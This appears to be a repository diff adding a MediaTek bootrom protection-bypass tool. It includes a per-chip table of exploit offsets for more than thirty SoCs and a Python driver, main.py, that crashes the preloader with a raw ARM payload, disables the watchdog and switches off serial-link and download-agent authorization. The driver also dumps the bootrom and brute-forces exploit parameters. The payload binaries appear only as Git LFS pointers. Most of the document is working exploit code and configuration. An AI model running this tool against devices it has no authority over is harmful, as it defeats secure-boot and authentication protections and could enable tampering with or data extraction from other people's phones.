+ "payload": "mt6797_payload.bin",
143
+ "ptr_usbdl": 0x9eac,
144
+ "ptr_da": 0xa354,
145
+ },
146
+
147
+ "0x816": { // mt6885
148
+ "payload": "mt6885_payload.bin",
149
+ "ptr_usbdl": 0xe6b8,
150
+ "ptr_da": 0xebbc,
151
+ },
152
+
153
+ "0x8127": { // mt8127
154
+ "payload": "mt8127_payload.bin",
155
+ "ptr_usbdl": 0xb2b8,
156
+ "ptr_da": 0xb740,
157
+ },
158
+
159
+ "0x8163": { // mt8163
160
+ "var_1": 0xB1,
161
+ "payload": "mt8163_payload.bin",
162
+ "ptr_usbdl": 0xc12c,
163
+ "ptr_da": 0xc5c8,
164
+ },
165
+
166
+ "0x8167": { // mt8516
167
+ "var_1": 0xCC,
168
+ "payload": "mt8167_payload.bin",
169
+ "ptr_usbdl": 0xd2e4,
170
+ "ptr_da": 0xd7ac,
171
+ },
172
+
173
+ "0x8172": { // mt8173
174
+ "payload": "mt8173_payload.bin",
175
+ "payload_address": 0x120A00,
176
+ "ptr_usbdl": 0xa0e4,
177
+ "ptr_da": 0xa580,
178
+ },
179
+
180
+ "0x8695": { // mt8695
181
+ "payload": "mt8695_payload.bin",
182
+ "ptr_usbdl": 0xbeec,
183
+ "ptr_da": 0xc3f8,
184
+ },
185
+
186
+ "0x886": { // mt6873
187
+ "payload": "mt6873_payload.bin",
188
+ "ptr_usbdl": 0xea78,
189
+ "ptr_da": 0xef38,
190
+ },
191
+
192
+ "0x562": { // mt6799
193
+ "watchdog_address": 0x10211000,
194
+ "payload": "mt6799_payload.bin",
195
+ "ptr_usbdl": 0xf5ac,
196
+ "ptr_da": 0xfa78,
197
+ },
198
+
199
+ "0x989": { // mt6833
200
+ "payload": "mt6833_payload.bin",
201
+ "ptr_usbdl": 0xdfe0,
202
+ "ptr_da": 0xe4a0,
203
+ },
204
+
205
+ "0x996": { // mt6853
206
+ "payload": "mt6853_payload.bin",
207
+ "ptr_usbdl": 0xea64,
208
+ "ptr_da": 0xef24,
209
+ },
210
+
211
+ "0x8590": { // mt8590
212
+ "payload": "mt8590_payload.bin",
213
+ "ptr_usbdl": 0xbbe4,
214
+ "ptr_da": 0xc06c,
215
+ },
216
+ }
exploits_collection/README.md ADDED
@@ -0,0 +1,34 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ ### Supported SoCs
2
+ - mt6261
3
+ - mt6572
4
+ - mt6580
5
+ - mt6582
6
+ - mt6592
7
+ - mt6595
8
+ - mt6735
9
+ - mt6737
10
+ - mt6739
11
+ - mt6750
12
+ - mt6753
13
+ - mt6755
14
+ - mt6757
15
+ - mt6761
16
+ - mt6763
17
+ - mt6765
18
+ - mt6768
19
+ - mt6771
20
+ - mt6779
21
+ - mt6785
22
+ - mt6795
23
+ - mt6797
24
+ - mt6799
25
+ - mt6833
26
+ - mt6853
27
+ - mt6873
28
+ - mt6885
29
+ - mt8127
30
+ - mt8163
31
+ - mt8167
32
+ - mt8173
33
+ - mt8590
34
+ - mt8695
exploits_collection/default_config.json5 ADDED
@@ -0,0 +1,216 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "0x6261": { // mt6261
3
+ "payload": "mt6261_payload.bin",
4
+ "var_1": 0x28,
5
+ "watchdog_address": 0xA0030000,
6
+ },
7
+
8
+ "0x6572": { // mt6572
9
+ "payload": "mt6572_payload.bin",
10
+ "payload_address": 0x10036A0,
11
+ "ptr_usbdl": 0x40ba68,
12
+ "ptr_da": 0x40befc,
13
+ },
14
+
15
+ "0x6580": { // mt6580
16
+ "payload": "mt6580_payload.bin",
17
+ "var_1": 0xAC,
18
+ "ptr_usbdl": 0xb60c,
19
+ "ptr_da": 0xba94,
20
+ },
21
+
22
+ "0x6582": { // mt6582
23
+ "payload": "mt6582_payload.bin",
24
+ "ptr_usbdl": 0xa5fc,
25
+ "ptr_da": 0xaa84,
26
+ },
27
+
28
+ "0x6592": { // mt6592
29
+ "payload": "mt6592_payload.bin",
30
+ "ptr_usbdl": 0xa564,
31
+ "ptr_da": 0xa9ec,
32
+ },
33
+
34
+ "0x6595": { // mt6595
35
+ "payload": "mt6595_payload.bin",
36
+ "ptr_usbdl": 0xb218,
37
+ "ptr_da": 0xb6a0,
38
+ },
39
+
40
+ "0x321": { // mt6735
41
+ "watchdog_address": 0x10212000,
42
+ "var_0": 0x10,
43
+ "var_1": 0x28,
44
+ "payload": "mt6735_payload.bin",
45
+ "ptr_usbdl": 0x95f8,
46
+ "ptr_da": 0x9a94,
47
+ },
48
+
49
+ "0x335": { // mt6737
50
+ "watchdog_address": 0x10212000,
51
+ "var_0": 0x10,
52
+ "var_1": 0x28,
53
+ "payload": "mt6737_payload.bin",
54
+ "ptr_usbdl": 0x9608,
55
+ "ptr_da": 0x9aa4,
56
+ },
57
+
58
+ "0x699": { // mt6739
59
+ "var_0": 0x20,
60
+ "var_1": 0xB4,
61
+ "payload": "mt6739_payload.bin",
62
+ "ptr_usbdl": 0xdf1c,
63
+ "ptr_da": 0xe3e8,
64
+ },
65
+
66
+ "0x337": { // mt6753
67
+ "watchdog_address": 0x10212000,
68
+ "var_1": 0x28,
69
+ "payload": "mt6753_payload.bin",
70
+ "ptr_usbdl": 0x9668,
71
+ "ptr_da": 0x9b04,
72
+ },
73
+
74
+ "0x326": { // mt6755
75
+ "payload": "mt6755_payload.bin",
76
+ "ptr_usbdl": 0x9a6c,
77
+ "ptr_da": 0x9f14,
78
+ },
79
+
80
+ "0x551": { // mt6757
81
+ "payload": "mt6757_payload.bin",
82
+ "ptr_usbdl": 0x9c2c,
83
+ "ptr_da": 0xa0e8,
84
+ },
85
+
86
+ "0x717": { // mt6761
87
+ "var_1": 0x25,
88
+ "payload": "mt6761_payload.bin",
89
+ "ptr_usbdl": 0xbc8c,
90
+ "ptr_da": 0xc158,
91
+ },
92
+
93
+ "0x690": { // mt6763
94
+ "var_1": 0x7F,
95
+ "payload": "mt6763_payload.bin",
96
+ "ptr_usbdl": 0xd66c,
97
+ "ptr_da": 0xdb38,
98
+ },
99
+
100
+ "0x766": { // mt6765
101
+ "var_0": 0x2C,
102
+ "var_1": 0x25,
103
+ "payload": "mt6765_payload.bin",
104
+ "ptr_usbdl": 0xbdc0,
105
+ "ptr_da": 0xc28c
106
+ },
107
+
108
+ "0x707": { // mt6768
109
+ "var_0": 0x2C,
110
+ "var_1": 0x25,
111
+ "payload": "mt6768_payload.bin",
112
+ "ptr_usbdl": 0xc190,
113
+ "ptr_da": 0xc650,
114
+ },
115
+
116
+ "0x788": { // mt6771
117
+ "var_0": 0x20,
118
+ "payload": "mt6771_payload.bin",
119
+ "ptr_usbdl": 0xdebc,
120
+ "ptr_da": 0xe388,
121
+ },
122
+
123
+ "0x725": { // mt6779
124
+ "payload": "mt6779_payload.bin",
125
+ "ptr_usbdl": 0xe04c,
126
+ "ptr_da": 0xe50c,
127
+ },
128
+
129
+ "0x813": { // mt6785
130
+ "payload": "mt6785_payload.bin",
131
+ "ptr_usbdl": 0xe2a4,
132
+ "ptr_da": 0xe764,
133
+ },
134
+
135
+ "0x6795": { // mt6795
136
+ "payload": "mt6795_payload.bin",
137
+ "ptr_usbdl": 0x978c,
138
+ "ptr_da": 0x9c28,
139
+ },
140
+
141
+ "0x279": { // mt6797
142
+ "payload": "mt6797_payload.bin",
143
+ "ptr_usbdl": 0x9eac,
144
+ "ptr_da": 0xa354,
145
+ },
146
+
147
+ "0x816": { // mt6885
148
+ "payload": "mt6885_payload.bin",
149
+ "ptr_usbdl": 0xe6b8,
150
+ "ptr_da": 0xebbc,
151
+ },
152
+
153
+ "0x8127": { // mt8127
154
+ "payload": "mt8127_payload.bin",
155
+ "ptr_usbdl": 0xb2b8,
156
+ "ptr_da": 0xb740,
157
+ },
158
+
159
+ "0x8163": { // mt8163
160
+ "var_1": 0xB1,
161
+ "payload": "mt8163_payload.bin",
162
+ "ptr_usbdl": 0xc12c,
163
+ "ptr_da": 0xc5c8,
164
+ },
165
+
166
+ "0x8167": { // mt8516
167
+ "var_1": 0xCC,
168
+ "payload": "mt8167_payload.bin",
169
+ "ptr_usbdl": 0xd2e4,
170
+ "ptr_da": 0xd7ac,
171
+ },
172
+
173
+ "0x8172": { // mt8173
174
+ "payload": "mt8173_payload.bin",
175
+ "payload_address": 0x120A00,
176
+ "ptr_usbdl": 0xa0e4,
177
+ "ptr_da": 0xa580,
178
+ },
179
+
180
+ "0x8695": { // mt8695
181
+ "payload": "mt8695_payload.bin",
182
+ "ptr_usbdl": 0xbeec,
183
+ "ptr_da": 0xc3f8,
184
+ },
185
+
186
+ "0x886": { // mt6873
187
+ "payload": "mt6873_payload.bin",
188
+ "ptr_usbdl": 0xea78,
189
+ "ptr_da": 0xef38,
190
+ },
191
+
192
+ "0x562": { // mt6799
193
+ "watchdog_address": 0x10211000,
194
+ "payload": "mt6799_payload.bin",
195
+ "ptr_usbdl": 0xf5ac,
196
+ "ptr_da": 0xfa78,
197
+ },
198
+
199
+ "0x989": { // mt6833
200
+ "payload": "mt6833_payload.bin",
201
+ "ptr_usbdl": 0xdfe0,
202
+ "ptr_da": 0xe4a0,
203
+ },
204
+
205
+ "0x996": { // mt6853
206
+ "payload": "mt6853_payload.bin",
207
+ "ptr_usbdl": 0xea64,
208
+ "ptr_da": 0xef24,
209
+ },
210
+
211
+ "0x8590": { // mt8590
212
+ "payload": "mt8590_payload.bin",
213
+ "ptr_usbdl": 0xbbe4,
214
+ "ptr_da": 0xc06c,
215
+ },
216
+ }
exploits_collection/payloads/generic_dump_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:5fdceec17aad68669b214dd65caa45a2b889b897936b77803e2f466a348af349
3
+ size 296
exploits_collection/payloads/generic_loader_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:e887a930a9477ab9a1e56b05b31bb5a58bed30664045338d97f7fe6dc71d3f54
3
+ size 64
exploits_collection/payloads/generic_reboot_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:f9c276cb23bc626753286de8b1ff96df5e4b25be3f59bbcf3a8032ac439fe108
3
+ size 48
exploits_collection/payloads/generic_uart_dump_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:bcc29db220226c4b900ddbf94023c6f3c3342ce705c26e3493502251238e4b32
3
+ size 312
exploits_collection/payloads/mt6261_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:6c55ce771f424d46fbb9af5ebab73dc35ce272365ca9eb443370b27bc3e31ff7
3
+ size 596
exploits_collection/payloads/mt6572_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:512dd5d09e4a34836b24e6caaa130d5209136a1759b1ef1be3dec9721bf04ccc
3
+ size 600
exploits_collection/payloads/mt6580_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:8ded7dfcad11bf60ee0e57b38d56e0ff7ccc8a6780c45fd9d8239ec8df53ba79
3
+ size 600
exploits_collection/payloads/mt6582_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:d65304bbcd3ee0b1c60dfaa706a183d5b3b29e8db62418d660855752289594d2
3
+ size 600
exploits_collection/payloads/mt6592_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:1d44e6cc8eb8d17c95a5b19ab5c951728ed39a6ea5b3e50b1df720df8649a9b4
3
+ size 600
exploits_collection/payloads/mt6595_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:d7a7363ed2b75a6796c94c6ade0c39a2838c00b7d5cf1e14a6ddcf607eb73634
3
+ size 600
exploits_collection/payloads/mt6735_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:5a845468619f58aa108236cd2e048374a374a0bf833b05969ffbdf2ca0bb662b
3
+ size 600
exploits_collection/payloads/mt6737_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:5b6efe0b5af21699007cd9eb47b88bdd800fd19d6ff70d65dceedd61ee7137e5
3
+ size 600
exploits_collection/payloads/mt6739_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:d372011cd5c72d94c635a1197c30b24716a8a4611f478888d4264004308ef9d2
3
+ size 612
exploits_collection/payloads/mt6750_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:4f952d41829f28b9ad88c0389c719a10c0942eb02ef32d3fe72f3c7fb7bd5f4e
3
+ size 684
exploits_collection/payloads/mt6753_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:ca48914ab40ce2fde63841b7651855c98477a5a93a79e6afc18c4b81d572b206
3
+ size 600
exploits_collection/payloads/mt6755_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:fa86a785a0bcf8468285c8922f931a94a2b23dcc93098b3281e5d52f28387262
3
+ size 600
exploits_collection/payloads/mt6757_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:c27f4b5d4b33c7bfd42d84927371041deb45f195797ebf371d7f713c93f90f57
3
+ size 600
exploits_collection/payloads/mt6761_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:f0d4f402ecdd17244d96db79e81bbbb4569a093ef0d97709d3cad7d7a5e85ab0
3
+ size 612
exploits_collection/payloads/mt6763_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:c193fa0c493f90471b23c3a89b339b4523df9cb15e6d9b1e24a749121522cffb
3
+ size 612
exploits_collection/payloads/mt6765_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:da9d34f8d56cc943683620eb79fc48b73872c6cb7e85454c50585fa68b496f46
3
+ size 612
exploits_collection/payloads/mt6768_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:8d812ae251c0b6294b8fc180169bd070e5d42b8e54a371cf14e635e4c3cc8302
3
+ size 612
exploits_collection/payloads/mt6771_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:7488880d5df691aa5fab26128a5632b8921350c31baeb43421735d8e03756bc7
3
+ size 612
exploits_collection/payloads/mt6779_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:02d95a77511902028a07df411ff51b869fad477b608d612368378f77607fff76
3
+ size 612
exploits_collection/payloads/mt6785_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:f0d47794bb84406ffd0c74a104f8d3237c5393859316b5712d8ce7c20fae4f3c
3
+ size 612
exploits_collection/payloads/mt6795_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:956b3b4c2643b38c39f1f1241cadd308def77c28c13940ecfe427e40130f59f2
3
+ size 600
exploits_collection/payloads/mt6797_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:e15b2acc3d2fae7b9dab5676cccbb610f1533eeffbf45ddba37777f7a8c6fe8b
3
+ size 600
exploits_collection/payloads/mt6799_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:a4604277287a3032f12651a1294c65c30367adece683220462ee4a2ad8148207
3
+ size 612
exploits_collection/payloads/mt6833_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:878f45230dc7433b45df93b141c34d2cf36f5fe6ac2f9c4e31be0c54d169b5de
3
+ size 612
exploits_collection/payloads/mt6853_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:0b98563fe19acc5f33af489603bce6678831a7d8674d73ecf2931abffea24a5d
3
+ size 612
exploits_collection/payloads/mt6873_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:657f7789d5997f439ef1ec7595675d48c08b8d08e0581b3776e166a85f8fa819
3
+ size 612
exploits_collection/payloads/mt6885_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:2a363f1175ec09660ba94b6b5bdbe506e044c4696eae43c3dfe2b1bef13c7440
3
+ size 612
exploits_collection/payloads/mt8127_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:372a67d80b5cca43858deed4f44e82f4c7a69faa0a28f8c1fa90fc8fe88de59f
3
+ size 600
exploits_collection/payloads/mt8163_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:450676f55daf21f1f6e1c733fa6d8c31b0d2b88598f203fc1e1a5282ffc4995e
3
+ size 600
exploits_collection/payloads/mt8167_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:ad6bf2b8f10554671715cc1fd27dcae86f6608d6af86b0686c7c5b9669b19a51
3
+ size 612
exploits_collection/payloads/mt8173_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:bc65b5184d97098cafcc431454e0549bbdb8e7d5b4f6148800c46343c218faf6
3
+ size 600
exploits_collection/payloads/mt8590_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:2d5fcc0f926684beb5c9558beecf29ac0f9b1244fdc701fee7ad0a6af3de39c8
3
+ size 600
exploits_collection/payloads/mt8695_payload.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:01653e6daf12d14014a2d3cae9fc2cab8afb34727228197fba09fce70eca035a
3
+ size 592
libusb-1.0.dll ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:6b24b0ee1a59cbae385dd15b06eddf2c72b2ff3a875ae279883a880136c59ec8
3
+ size 166912
main.py ADDED
@@ -0,0 +1,237 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #!/bin/python3
2
+
3
+ from src.exploit import exploit
4
+ from src.common import from_bytes, to_bytes
5
+ from src.config import Config
6
+ from src.device import Device
7
+ from src.logger import log
8
+ from src.bruteforce import bruteforce
9
+
10
+ import argparse
11
+ import os
12
+
13
+ DEFAULT_CONFIG = "exploits_collection/default_config.json5"
14
+ PAYLOAD_DIR = "exploits_collection/payloads/"
15
+ DEFAULT_PAYLOAD = "generic_dump_payload.bin"
16
+ DEFAULT_DA_ADDRESS = 0x200D00
17
+
18
+
19
+ def main():
20
+ parser = argparse.ArgumentParser()
21
+ parser.add_argument("-c", "--config", help="Device config")
22
+ parser.add_argument("-t", "--test", help="Testmode", const="0x9900", nargs='?')
23
+ parser.add_argument("-w", "--watchdog", help="Watchdog address(in hex)")
24
+ parser.add_argument("-u", "--uart", help="UART base address(in hex)")
25
+ parser.add_argument("-v", "--var_1", help="var_1 value(in hex)")
26
+ parser.add_argument("-a", "--payload_address", help="payload_address value(in hex)")
27
+ parser.add_argument("-p", "--payload", help="Payload to use")
28
+ parser.add_argument("-f", "--force", help="Force exploit on insecure device", action="store_true")
29
+ parser.add_argument("-n", "--no_handshake", help="Skip handshake", action="store_true")
30
+ parser.add_argument("-m", "--crash_method", help="Method to use for crashing preloader (0, 1, 2)", type=int)
31
+ parser.add_argument("-k", "--kamakiri", help="Force use of kamakiri", action="store_true")
32
+ arguments = parser.parse_args()
33
+
34
+ if arguments.config:
35
+ if not os.path.exists(arguments.config):
36
+ raise RuntimeError("Config file {} doesn't exist".format(arguments.config))
37
+ elif not os.path.exists(DEFAULT_CONFIG):
38
+ raise RuntimeError("Default config is missing")
39
+
40
+ device = Device().find()
41
+
42
+ config, serial_link_authorization, download_agent_authorization, hw_code = get_device_info(device, arguments)
43
+
44
+ while device.preloader:
45
+ device = crash_preloader(device, config)
46
+ config, serial_link_authorization, download_agent_authorization, hw_code = get_device_info(device, arguments)
47
+
48
+ log("Disabling watchdog timer")
49
+ device.write32(config.watchdog_address, 0x22000064)
50
+
51
+ if device.libusb0:
52
+ arguments.kamakiri = True
53
+
54
+ bootrom__name = "bootrom_" + hex(hw_code)[2:] + ".bin"
55
+
56
+ if arguments.test and not arguments.kamakiri:
57
+ dump_ptr = int(arguments.test, 16)
58
+ found = False
59
+ while not found:
60
+ log("Test mode, testing " + hex(dump_ptr) + "...")
61
+ found, dump_ptr = bruteforce(device, config, dump_ptr)
62
+ device.dev.close()
63
+ reconnect_message()
64
+ device = Device().find(wait=True)
65
+ device.handshake()
66
+ while device.preloader:
67
+ device = crash_preloader(device, config)
68
+ device.handshake()
69
+ log("Found " + hex(dump_ptr) + ", dumping bootrom to {}".format(bootrom__name))
70
+ open(bootrom__name, "wb").write(bruteforce(device, config, dump_ptr, True))
71
+ exit(0)
72
+
73
+ if serial_link_authorization or download_agent_authorization or arguments.force:
74
+ log("Disabling protection")
75
+
76
+ payload = prepare_payload(config)
77
+
78
+ result = exploit(device, config, payload, arguments)
79
+ if arguments.test:
80
+ while not result:
81
+ device.dev.close()
82
+ config.var_1 += 1
83
+ log("Test mode, testing " + hex(config.var_1) + "...")
84
+ reconnect_message()
85
+ device = Device().find(wait=True)
86
+ device.handshake()
87
+ while device.preloader:
88
+ device = crash_preloader(device, config)
89
+ device.handshake()
90
+ result = exploit(device, config, payload, arguments)
91
+ else:
92
+ log("Insecure device, sending payload using send_da")
93
+
94
+ if not arguments.payload:
95
+ config.payload = DEFAULT_PAYLOAD
96
+ if not arguments.payload_address:
97
+ config.payload_address = DEFAULT_DA_ADDRESS
98
+
99
+ payload = prepare_payload(config)
100
+
101
+ payload += b'\x00' * 0x100
102
+
103
+ device.send_da(config.payload_address, len(payload), 0x100, payload)
104
+ device.jump_da(config.payload_address)
105
+
106
+ result = device.read(4)
107
+
108
+ if result == to_bytes(0xA1A2A3A4, 4):
109
+ log("Protection disabled")
110
+ elif result == to_bytes(0xC1C2C3C4, 4):
111
+ dump_brom(device, bootrom__name)
112
+ elif result == to_bytes(0x0000C1C2, 4) and device.read(4) == to_bytes(0xC1C2C3C4, 4):
113
+ dump_brom(device, bootrom__name, True)
114
+ elif result != b'':
115
+ raise RuntimeError("Unexpected result {}".format(result.hex()))
116
+ else:
117
+ log("Payload did not reply")
118
+
119
+ device.close()
120
+
121
+ def reconnect_message():
122
+ print("")
123
+ print("Please reconnect device in bootrom mode")
124
+ print("")
125
+
126
+ def dump_brom(device, bootrom__name, word_mode=False):
127
+ log("Found send_dword, dumping bootrom to {}".format(bootrom__name))
128
+
129
+ with open(bootrom__name, "wb") as bootrom:
130
+ if word_mode:
131
+ for i in range(0x20000 // 4):
132
+ device.read(4) # discard garbage
133
+ bootrom.write(device.read(4))
134
+ else:
135
+ bootrom.write(device.read(0x20000))
136
+
137
+
138
+ def prepare_payload(config):
139
+ with open(PAYLOAD_DIR + config.payload, "rb") as payload:
140
+ payload = payload.read()
141
+
142
+ # replace watchdog_address and uart_base in generic payload
143
+ payload = bytearray(payload)
144
+ if from_bytes(payload[-4:], 4, '<') == 0x10007000:
145
+ payload[-4:] = to_bytes(config.watchdog_address, 4, '<')
146
+ if from_bytes(payload[-8:][:4], 4, '<') == 0x11002000:
147
+ payload[-8:] = to_bytes(config.uart_base, 4, '<') + payload[-4:]
148
+ payload = bytes(payload)
149
+
150
+ while len(payload) % 4 != 0:
151
+ payload += to_bytes(0)
152
+
153
+ return payload
154
+
155
+
156
+ def get_device_info(device, arguments):
157
+ if not arguments.no_handshake:
158
+ device.handshake()
159
+
160
+ hw_code = device.get_hw_code()
161
+ hw_sub_code, hw_ver, sw_ver = device.get_hw_dict()
162
+ secure_boot, serial_link_authorization, download_agent_authorization = device.get_target_config()
163
+
164
+ if arguments.config:
165
+ config_file = open(arguments.config)
166
+ config = Config().from_file(config_file, hw_code)
167
+ config_file.close()
168
+ else:
169
+ try:
170
+ config = Config().default(hw_code)
171
+ except NotImplementedError as e:
172
+ if arguments.test:
173
+ config = Config()
174
+
175
+ log(e)
176
+ else:
177
+ raise e
178
+
179
+ if arguments.test:
180
+ config.payload = DEFAULT_PAYLOAD
181
+ if arguments.var_1:
182
+ config.var_1 = int(arguments.var_1, 16)
183
+ if arguments.watchdog:
184
+ config.watchdog_address = int(arguments.watchdog, 16)
185
+ if arguments.uart:
186
+ config.uart_base = int(arguments.uart, 16)
187
+ if arguments.payload_address:
188
+ config.payload_address = int(arguments.payload_address, 16)
189
+ if arguments.payload:
190
+ config.payload = arguments.payload
191
+ if arguments.crash_method:
192
+ config.crash_method = arguments.crash_method
193
+
194
+
195
+ if not os.path.exists(PAYLOAD_DIR + config.payload):
196
+ raise RuntimeError("Payload file {} doesn't exist".format(PAYLOAD_DIR + config.payload))
197
+
198
+ print()
199
+ log("Device hw code: {}".format(hex(hw_code)))
200
+ log("Device hw sub code: {}".format(hex(hw_sub_code)))
201
+ log("Device hw version: {}".format(hex(hw_ver)))
202
+ log("Device sw version: {}".format(hex(sw_ver)))
203
+ log("Device secure boot: {}".format(secure_boot))
204
+ log("Device serial link authorization: {}".format(serial_link_authorization))
205
+ log("Device download agent authorization: {}".format(download_agent_authorization))
206
+ print()
207
+
208
+ return config, serial_link_authorization, download_agent_authorization, hw_code
209
+
210
+ def crash_preloader(device, config):
211
+ print("")
212
+ log("Found device in preloader mode, trying to crash...")
213
+ print("")
214
+ if config.crash_method == 0:
215
+ try:
216
+ payload = b'\x00\x01\x9F\xE5\x10\xFF\x2F\xE1' + b'\x00' * 0x110
217
+ device.send_da(0, len(payload), 0, payload)
218
+ device.jump_da(0)
219
+ except RuntimeError as e:
220
+ log(e)
221
+ print("")
222
+ elif config.crash_method == 1:
223
+ payload = b'\x00' * 0x100
224
+ device.send_da(0, len(payload), 0x100, payload)
225
+ device.jump_da(0)
226
+ elif config.crash_method == 2:
227
+ device.read32(0)
228
+
229
+ device.dev.close()
230
+
231
+ device = Device().find()
232
+
233
+ return device
234
+
235
+
236
+ if __name__ == "__main__":
237
+ main()
mtk-bypass-utility.zip ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:d9f0a86c19b91f38cd8e64522fc8b550b3a750120902838a247a50350bd60d8b
3
+ size 6426596
